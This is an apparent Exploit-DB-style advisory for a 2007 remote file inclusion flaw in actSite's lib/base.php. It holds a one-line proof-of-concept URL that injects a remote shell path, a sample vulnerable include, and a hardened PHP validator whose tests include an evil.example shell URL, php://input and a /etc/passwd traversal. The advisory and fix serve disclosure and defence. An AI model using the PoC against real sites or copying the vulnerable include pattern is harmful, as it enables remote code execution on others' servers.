Vendor: actSite
By: DNX
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: actSite
Affected Version From: v1.991 Beta
Affected Version To: v1.995
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

actSite v1.991 Beta (base.php) Remote File Inclusion

A remote file inclusion vulnerability exists in actSite v1.991 Beta. It is caused by improper sanitization of the user-supplied $BaseCfg[BaseDir] parameter in lib/base.php, which is used to build an include path. An attacker can exploit this to include arbitrary remote files, which could lead to remote code execution.
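The following is an added example, not actSite's code and not part of the original advisory: a hypothetical reconstruction of the kind of include pattern the description refers to, placed next to a hardened replacement that resolves the include path and pins it inside the application root. The names $BaseCfg, BaseDir and lib/base.php come from the advisory; the function names, the lib/config.php file and the temporary demo directory are assumptions.

```php
<?php
// Added example (hypothetical; not actSite's code). $BaseCfg, BaseDir and
// lib/base.php are names from the advisory; everything else is assumed.

declare(strict_types=1);

// --- Vulnerable pattern (hypothetical reconstruction, never called here) ----
// On a 2007-era PHP install with register_globals=On, a request such as
// lib/base.php?BaseCfg[BaseDir]=... pre-populates $BaseCfg['BaseDir'] before
// this include runs, so the path is attacker-controlled. With allow_url_fopen
// (and, from PHP 5.2, allow_url_include) enabled, that path may be a URL and
// PHP fetches and executes the remote file.
function vulnerableInclude(array $BaseCfg): void
{
    include $BaseCfg['BaseDir'] . '/lib/config.php';
}

// --- Hardened pattern ---------------------------------------------------------
// 1. BaseDir is a deployment constant assigned by the application before any
//    include runs; it is never read from the request.
// 2. The final path is resolved with realpath() and must stay inside the
//    application root. realpath() returns false for stream wrappers
//    (http://, ftp://, php://, data://) and for files that do not exist, and
//    the prefix check rejects ../ traversal out of the root.
function safeIncludePath(string $appRoot, string $relative): string
{
    // Refuse anything that looks like a stream wrapper before touching the FS.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $relative) === 1) {
        throw new RuntimeException("stream wrapper not allowed: $relative");
    }
    $root = realpath($appRoot);
    if ($root === false) {
        throw new RuntimeException("application root does not exist: $appRoot");
    }
    $resolved = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($resolved === false || strpos($resolved, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include path escapes application root: $relative");
    }
    return $resolved;
}

// --- Demo against a constructed application root ------------------------------
$appRoot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'actsite-demo-' . getmypid();
mkdir($appRoot . '/lib', 0700, true);
file_put_contents($appRoot . '/lib/config.php', "<?php\nreturn ['BaseDir' => __DIR__];\n");

$BaseCfg = ['BaseDir' => $appRoot];   // set by the application, not by the request

$candidates = [
    'lib/config.php',                  // legitimate include
    'http://evil.example/shell.txt',   // remote URL, the shape of the advisory's PoC
    'php://input',                     // wrapper without a host part
    '../../etc/passwd',                // local traversal out of the root
];
foreach ($candidates as $candidate) {
    try {
        $path = safeIncludePath($BaseCfg['BaseDir'], $candidate);
        require $path;                 // only reached for paths inside the root
        printf("ALLOW %-32s -> %s\n", $candidate, $path);
    } catch (RuntimeException $e) {
        printf("DENY  %-32s -> %s\n", $candidate, $e->getMessage());
    }
}

// Defence in depth: both settings should be off (or absent) on any host.
foreach (['register_globals', 'allow_url_include'] as $ini) {
    $value = ini_get($ini);
    printf("%s=%s\n", $ini, $value === false ? '(removed in this PHP version)' : var_export((bool) $value, true));
}

unlink($appRoot . '/lib/config.php');
rmdir($appRoot . '/lib');
rmdir($appRoot);
```

Run it with `php example.php`; the legitimate path is allowed and the three hostile candidates are denied. The wrapper regex is redundant with the realpath() check but makes the intent explicit and fails fast; the ini report at the end is the configuration-level check a reviewer would ask for alongside the code fix.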

Mitigation:

Install the update to v1.995.

Exploit-DB raw data:

                             \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo--------------------
   | actSite v1.991 Beta (base.php) Remote File Inclusion |
   |                     coded by DNX                     |
   --------------------------------------------------------

[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes

[!] Background: actSite is a content management system based on PHP and MySQL

[!] Bug: $BaseCfg[BaseDir] in lib/base.php

[!] PoC: 
    - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]

[!] Solution: Install update to v1.995

# milw0rm.com [2007-10-01]